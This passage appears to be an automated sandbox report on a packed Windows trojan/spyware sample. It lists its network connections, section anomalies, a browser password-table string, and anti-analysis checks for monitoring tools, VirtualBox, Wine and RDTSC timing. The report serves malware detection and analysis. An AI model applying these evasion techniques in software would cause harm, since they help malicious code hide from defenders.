                Source: zi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: zi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.9:49758 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49763 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: zi042476Iv.exeStatic PE information: section name:
                Source: zi042476Iv.exeStatic PE information: section name: .rsrc
                Source: zi042476Iv.exeStatic PE information: section name: .idata
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013769BD0_3_013769BD
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013769BD0_3_013769BD
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013769BD0_3_013769BD
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013769BD0_3_013769BD
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013769BD0_3_013769BD
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013769BD0_3_013769BD
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013769BD0_3_013769BD
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013769BD0_3_013769BD
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013769BD0_3_013769BD
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013769BD0_3_013769BD
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013769BD0_3_013769BD
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013769BD0_3_013769BD
                Source: zi042476Iv.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: zi042476Iv.exeStatic PE information: Section: ZLIB complexity 0.9996234170751634
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/2
                Source: C:\Users\user\Desktop\zi042476Iv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: zi042476Iv.exe, 00000000.00000003.1383200376.0000000005C3D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382965546.0000000005C58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: zi042476Iv.exeVirustotal: Detection: 52%
                Source: zi042476Iv.exeReversingLabs: Detection: 57%
                Source: zi042476Iv.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: zi042476Iv.exeString found in binary or memory: oRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeh`
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile read: C:\Users\user\Desktop\zi042476Iv.exeJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: zi042476Iv.exeStatic file information: File size 2941952 > 1048576
                Source: zi042476Iv.exeStatic PE information: Raw size of wwzrppjr is bigger than: 0x100000 < 0x2a4600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\zi042476Iv.exeUnpacked PE file: 0.2.zi042476Iv.exe.160000.0.unpack :EW;.rsrc :W;.idata :W;wwzrppjr:EW;vmxrzajb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;wwzrppjr:EW;vmxrzajb:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: zi042476Iv.exeStatic PE information: real checksum: 0x2d1d7a should be: 0x2da1e1
                Source: zi042476Iv.exeStatic PE information: section name:
                Source: zi042476Iv.exeStatic PE information: section name: .rsrc
                Source: zi042476Iv.exeStatic PE information: section name: .idata
                Source: zi042476Iv.exeStatic PE information: section name: wwzrppjr
                Source: zi042476Iv.exeStatic PE information: section name: vmxrzajb
                Source: zi042476Iv.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_01359C02 push edi; iretd 0_3_01359C49
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013705FE push edi; iretd 0_3_0137060F
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013705FE push edi; iretd 0_3_0137060F
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013705FE push edi; iretd 0_3_0137060F
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013705FE push edi; iretd 0_3_0137060F
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013705FE push edi; iretd 0_3_0137060F
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013705FE push edi; iretd 0_3_0137060F
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013705FE push edi; iretd 0_3_0137060F
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013705FE push edi; iretd 0_3_0137060F
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013705FE push edi; iretd 0_3_0137060F
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013705FE push edi; iretd 0_3_0137060F
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013705FE push edi; iretd 0_3_0137060F
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_013705FE push edi; iretd 0_3_0137060F
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_01359C02 push edi; iretd 0_3_01359C49
                Source: C:\Users\user\Desktop\zi042476Iv.exeCode function: 0_3_01359C02 push edi; iretd 0_3_01359C49
                Source: zi042476Iv.exeStatic PE information: section name: entropy: 7.98432450240108

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\zi042476Iv.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\zi042476Iv.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\zi042476Iv.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 1B922E second address: 1B9233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 32CC1C second address: 32CC39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F29FC524586h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 32CC39 second address: 32CC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 335FB5 second address: 335FD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F29FC524587h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 335FD2 second address: 335FE4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F29FC6B5CA9h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 335FE4 second address: 335FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC52457Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 335FF5 second address: 336001 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F29FC6B5C96h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 336001 second address: 33601F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524584h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3362A2 second address: 3362BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3362BF second address: 3362C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3362C8 second address: 3362CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3366FF second address: 336705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 336705 second address: 33670B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 33670B second address: 33670F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 33670F second address: 336725 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F29FC6B5C9Ah 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 336725 second address: 33672F instructions: 0x00000000 rdtsc 0x00000002 js 00007F29FC524576h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3395B5 second address: 3395CF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F29FC6B5C9Fh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3395CF second address: 3395FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F29FC524576h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f add edi, dword ptr [ebp+122D3835h] 0x00000015 push 00000000h 0x00000017 cmc 0x00000018 call 00007F29FC524579h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jnp 00007F29FC524576h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3395FA second address: 339600 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 339600 second address: 339616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 339616 second address: 339654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F29FC6B5CA2h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jne 00007F29FC6B5C9Eh 0x00000017 push eax 0x00000018 jo 00007F29FC6B5C96h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jl 00007F29FC6B5C9Ch 0x0000002b jne 00007F29FC6B5C96h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 339654 second address: 3396FB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29FC52457Ch 0x00000008 jbe 00007F29FC524576h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 movsx edx, di 0x00000014 push 00000003h 0x00000016 mov dword ptr [ebp+122D35D1h], eax 0x0000001c push 00000000h 0x0000001e movsx edx, dx 0x00000021 mov ch, ah 0x00000023 push 00000003h 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F29FC524578h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 00000017h 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f movsx esi, bx 0x00000042 push 6F51D8E7h 0x00000047 push edx 0x00000048 jbe 00007F29FC52457Ch 0x0000004e jg 00007F29FC524576h 0x00000054 pop edx 0x00000055 add dword ptr [esp], 50AE2719h 0x0000005c lea ebx, dword ptr [ebp+12454480h] 0x00000062 push 00000000h 0x00000064 push ebp 0x00000065 call 00007F29FC524578h 0x0000006a pop ebp 0x0000006b mov dword ptr [esp+04h], ebp 0x0000006f add dword ptr [esp+04h], 00000014h 0x00000077 inc ebp 0x00000078 push ebp 0x00000079 ret 0x0000007a pop ebp 0x0000007b ret 0x0000007c and esi, dword ptr [ebp+122D36A9h] 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 jo 00007F29FC52458Bh 0x0000008b jmp 00007F29FC524585h 0x00000090 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3396FB second address: 339702 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 339819 second address: 33981E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 33981E second address: 339835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC6B5CA3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 35A1D4 second address: 35A1DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 35A1DA second address: 35A1E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F29FC6B5C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 35A1E4 second address: 35A201 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524585h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 35847F second address: 358483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3588E0 second address: 3588EA instructions: 0x00000000 rdtsc 0x00000002 je 00007F29FC52458Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 358E34 second address: 358E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 358E3D second address: 358E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 358E41 second address: 358E47 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 358FCC second address: 358FD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3590EB second address: 35912C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC6B5CA0h 0x00000009 jg 00007F29FC6B5C96h 0x0000000f jnc 00007F29FC6B5C96h 0x00000015 popad 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 pushad 0x0000001a popad 0x0000001b pop edx 0x0000001c popad 0x0000001d pushad 0x0000001e push ecx 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 pop ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 pop eax 0x00000028 jmp 00007F29FC6B5C9Eh 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 35912C second address: 35914F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F29FC52457Ah 0x00000011 push esi 0x00000012 pop esi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 35914F second address: 359153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 359153 second address: 35915D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F29FC524576h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 34CD4B second address: 34CD53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 34CD53 second address: 34CD58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 359BAB second address: 359BD8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F29FC6B5CA5h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop esi 0x00000011 jng 00007F29FC6B5C9Ch 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 359BD8 second address: 359BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC524587h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 359BF3 second address: 359BF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 359FEB second address: 35A00B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F29FC524583h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 35A00B second address: 35A02E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC6B5CA4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F29FC6B5C96h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 35A02E second address: 35A032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 35A032 second address: 35A036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
